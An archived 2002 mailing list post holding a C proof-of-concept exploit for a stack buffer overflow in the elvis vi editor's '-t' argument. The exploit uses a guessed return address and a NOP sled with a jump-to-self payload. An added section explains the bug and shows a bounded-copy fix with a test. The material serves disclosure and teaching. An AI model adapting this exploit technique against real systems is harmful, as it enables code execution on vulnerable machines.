Vulnerability Development mailing list archives
Re: VIM Buffer Overflow
From: Felipe Cerqueira <fcerqueira () bufferoverflow org>
Date: Sun, 17 Feb 2002 11:31:24 -0300 (BRT)
/* elvis 2.1_4 (slackware 8.0) Expl by skylazart
 *
 * It's only for demonstration purpose!
 */
#include <stdio.h>
#include <string.h>   /* memset */
#include <unistd.h>   /* execve */
#include <stdlib.h>   /* atoi */

int main (int argc, char **argv)
{
    char buffer[120 + 1];
    long ret_addr = 0xbffffcfc;
    char sc[] = "\xeb\xfe"; /* loop for me please! ;) */
    int i;
    char *argv1[] = {"/usr/bin/vi", "-t", buffer, NULL};

    /* optional offset from the guessed return address */
    if ( argc > 1 )
        ret_addr += atoi ( argv[1] );

    /* fill the 120-byte argument with the return address (4 bytes at a time,
     * stopping at 120 so the loop itself does not run past the buffer) */
    for ( i = 0; i < 120; i += 4 )
        *(long *)&buffer[i] = ret_addr;

    /* nop sled, then the 2-byte jmp-to-self so the process just spins */
    memset (buffer, 0x90, 22);
    buffer[22] = sc[0];
    buffer[23] = sc[1];
    buffer[120] = '\0';

    printf ("returning to 0x%08lx\n", ret_addr);
    printf ("endless loop.. ps auxw and kill it \\xeb\\xfe jump *ebp;)\n");
    execve ("/usr/bin/vi", argv1, NULL);
    return (0);
}

it only stops consisting...

root 3740 99.9 0.3 1668 780 tty2 R 11:30 0:14 /usr/bin/vi -t ??

-- 
Felipe Cerqueira
Buffer Overflow Inf. Ltda.
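The bug class the PoC above relies on is an over-long command-line argument (here the `-t` tag name) copied into a fixed-size stack buffer. The following is an added example, not code from the post and not elvis's source: it shows the unsafe copy pattern next to a bounded replacement that rejects an argument which would not fit, and checks it against an input of the same 120-byte length the PoC sends. `TAG_MAX`, `tag_copy_bounded` and `accept_tag_arg` are names chosen for this example.

```c
/* Added example (not from the post or from elvis). Illustrates the bug class
 * behind the PoC: a fixed-size stack buffer filled from an untrusted argv
 * entry. tag_copy_unbounded() is the pattern to avoid; tag_copy_bounded() is
 * the fix: measure, reject what will not fit, never write past the buffer. */
#include <stdio.h>
#include <string.h>

#define TAG_MAX 64  /* hypothetical tag buffer size, chosen for the example */

/* Vulnerable pattern: strcpy trusts the caller's length. Shown only for
 * contrast; nothing in this example calls it. */
void tag_copy_unbounded(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Hardened version. Returns 0 on success, -1 if src (plus its NUL) would not
 * fit in dstsz bytes. On failure dst is left untouched rather than silently
 * truncated, so the caller can refuse the argument outright. */
int tag_copy_bounded(char *dst, size_t dstsz, const char *src)
{
    size_t n = 0;

    if (dst == NULL || src == NULL || dstsz == 0)
        return -1;

    /* bounded length scan: stops at dstsz, so a huge argument costs at most
     * dstsz bytes of reading and can never be counted past the buffer */
    while (n < dstsz && src[n] != '\0')
        n++;

    if (n == dstsz)          /* no room for the terminating NUL */
        return -1;

    memcpy(dst, src, n + 1); /* copies the NUL as well */
    return 0;
}

/* Mirrors "vi -t <tag>": accept (0) or reject (-1) the tag argument. */
int accept_tag_arg(const char *arg)
{
    char tag[TAG_MAX];
    return tag_copy_bounded(tag, sizeof tag, arg);
}

/* Same check against a scratch buffer of an arbitrary size (<= TAG_MAX). */
int tag_fits(size_t dstsz, const char *src)
{
    char scratch[TAG_MAX];
    if (dstsz > sizeof scratch)
        return -1;
    return tag_copy_bounded(scratch, dstsz, src);
}

/* Constructed input: 120 bytes, the length the PoC passes to -t. */
int poc_sized_arg_accepted(void)
{
    char big[121];
    memset(big, 'A', 120);
    big[120] = '\0';
    return accept_tag_arg(big);
}

int main(void)
{
    printf("tag 'main':    %s\n", accept_tag_arg("main") == 0 ? "accepted" : "rejected");
    printf("120-byte tag:  %s\n", poc_sized_arg_accepted() == 0 ? "accepted" : "rejected");
    return 0;
}
```

Rejecting rather than truncating is deliberate: a silently shortened tag name would make the editor search for the wrong symbol, and an explicit failure is also the point at which a program can log the oversized argument.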